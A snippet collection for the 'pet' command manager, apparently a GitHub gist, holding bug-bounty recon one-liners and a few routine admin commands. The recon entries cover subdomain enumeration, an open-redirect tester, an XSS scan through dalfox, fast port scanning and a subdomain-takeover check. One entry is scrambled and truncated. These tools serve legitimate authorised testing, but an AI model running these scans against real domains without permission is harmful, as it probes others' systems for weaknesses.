command = "export LHOST=\"http://localhost\"; gau <domain> | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get bugcrowd programs"
command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "one | uniq); doneGet CIDR and Orgz from target lists"
command = "for DOMAIN in $(cat <FILE NAME>);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e \"CIDR\\|Organization\" | tr -s \" \" | paste - -; d"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get hackerone programs"
command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get intigriti programs"
command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from Archive"
command = "curl -s \"http://web.archive.org/cdx/search/cdx?url=*.<domain>/*&output=text&fl=original&collapse=urlkey\" | sed -e 's_https*://__' -e \"s/\\/.*//\" | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from BufferOverRun"
command = "curl -s https://dns.bufferover.run/dns?q=.<domain> |jq -r .FDNS_A[]|cut -d',' -f2|sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from CertSpotter"
command = "curl -s \"https://certspotter.com/api/v0/certs?domain=<domain>\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from crt.sh"
command = "curl -s \"https://crt.sh/?q=%25.<domain>&output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from JLDC"
command = "curl -s \"https://jldc.me/anubis/subdomains/<domain>?\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from RapidDNS.io"
command = "curl -s \"https://rapiddns.io/subdomain/<domain>?full=1#result\" | grep \"<td><a\" | cut -d '\"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from Riddler.io"
command = "curl -s \"https://riddler.io/search/exportcsv?q=pld:<domain>\" | grep -Po \"(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get Subdomains from VirusTotal"
command = "curl -s \"https://www.virustotal.com/ui/domains/<domain>/subdomains?limit=40\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get url with gau, included parameter"
command = "echo <domain> | ~/go/bin/gau | grep \"=\" | qsreplace -a "
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get all the urls out of a sitemap.xml"
command = "curl -s <sitemap URL> | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get urls from urlscanio"
command = "gron \"https://urlscan.io/api/v1/search/?q=domain:<domain>\" | grep 'url' | gron --ungron"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Find XSS with gospider"
command = "gospider -S <TARGET URLS FILE> -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe -o result.txt"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "ipinfo"
command = "curl http://ipinfo.io/<param>"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Create a wordlist using param used in the domain"
command = "waybackurls <domain> | grep \"?\" | unfurl keys | sort -u | tee -a paramlist.txt"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Ports Scan without CloudFlare"
command = "subfinder -silent -d <domain> | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Sort & Tested Domains from Recon.dev"
command = "curl \"https://recon.dev/api/search?key=<API Key>&domain=<domain>\" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Find Subdomains TakeOver"
command = "subfinder -d <target> >> domains ; assetfinder -subs-only <target> >> domains ; amass enum -norecursive -noalts -d <target> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "Get multiple target's Custom URLs from ParamSpider"
command = "cat <domains file> | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "URLs Probing with cURL + Parallel"
command = "cat <domains file> | parallel -j50 -q curl -w 'Status:%{http_code}\\t Size:%{size_download}\\t %{url_effective}\\n' -o /dev/null -sk"
tag = ["hackpet"]
output = ""
[[snippets]]
description = "[Python] Install python module on current directory"
command = "pip3 install <MODULE_NAME=idna> -t ."
output = ""
[[snippets]]
description = "[Linux] Read file from Nth line using sed, read from line 4"
command = "sed -e '1,3d' < t.txt"
output = ""
[[snippets]]
description = "[AWS] get all aws region"
command = "aws ec2 describe-regions --output text | awk '{print $4}'"
output = ""
[[snippets]]
description = "[Misc] Running Django cookiecutter using gunicorn"
command = "gunicorn --bind <ip-address or hostname>:8000 config.wsgi:application"
output = ""
[[snippets]]
description = "[Laravel] Restart laravel after .env update"
command = "sudo -u ${USER} php artisan config:cache && sudo -u ${USER} php artisan route:clear"
output = ""
[[snippets]]
description = "[GIT] add remote repo to git"
command = "git remote set-url origin REPO_URL"
output = ""
[[snippets]]
description = "[Wireshark] Filter to display dns response from dns server"
command = "dns.flags.response == 1"
output = ""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment